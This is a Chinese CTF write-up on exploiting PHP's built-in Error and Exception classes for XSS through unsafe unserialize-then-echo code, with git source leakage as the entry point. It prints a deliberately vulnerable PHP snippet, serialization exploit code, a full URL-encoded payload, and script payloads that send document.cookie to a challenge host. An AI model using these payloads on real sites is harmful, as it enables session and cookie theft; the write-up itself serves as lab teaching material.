考查点:利用php原生类进行xss,git文件泄露
目录
知识点
__toString()
当对象被当作一个字符串使用时进行默认调用,比如
$aaa = new class(); echo $aaa; (class是一个类)
但不仅限于echo ,还有file_exist()判断也会进行触发
Error
环境:php7
Error是php的一个内置类,它有一个__toString的方法,所以可以造成xss漏洞。
测试一下:
1.php文件
<?php
$a = unserialize($_GET['c']);
echo $a;
?>
exp:
<?php
$a = new Error("<script>alert(1)</script>");
$b = serialize($a);
echo urlencode($b);
?>
exp的结果显示:
O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A25%3A%22%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A19%3A%22%2Fvar%2Fwww%2Fhtml%2F1.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D
向1.php文件传参
?c=O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A25%3A%22%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A19%3A%22%2Fvar%2Fwww%2Fhtml%2F1.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D
成功实现alert(1)
Exception
环境:php5、7
使用方法类似于Error,不过是exp的Error换为Exception
解题过程
首先打开容器,是这样的
git文件泄露,在python2.7的环境下使用GitHack工具读取源码
得到源码index.php
<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);
但是从这个仅仅能够得到参数的名称,不知道类,所以在这里就用到前面的只是了,找一个php内置类进行操作,同时可以查看本题的环境是php5,所以使用Exception来操作。
- window.open是js打开新的窗口的方法
- window.location.href='url'可以实现恶意跳转
- alert(document.cookie)可以用来弹出cookie,但是本题不行。
<?php
$a = new Exception("<script>window.open('http://7f34285c-b9d4-4034-9baa-8c7581cdbb2b.node3.buuoj.cn/?'+document.cookie);</script>");
$b = serialize($a);
echo urlencode($b);
$a = new Exception("<script>window.location.href='http://7f34285c-b9d4-4034-9baa-8c7581cdbb2b.node3.buuoj.cn'+document.cookie</script>");
$b = serialize($a);
echo urlencode($b);
$a = new Exception("<script>alert(document.cookie)</script>");
$b = serialize($a);
echo urlencode($b);
?>
得到结果
然后传参,flag就在cookie里面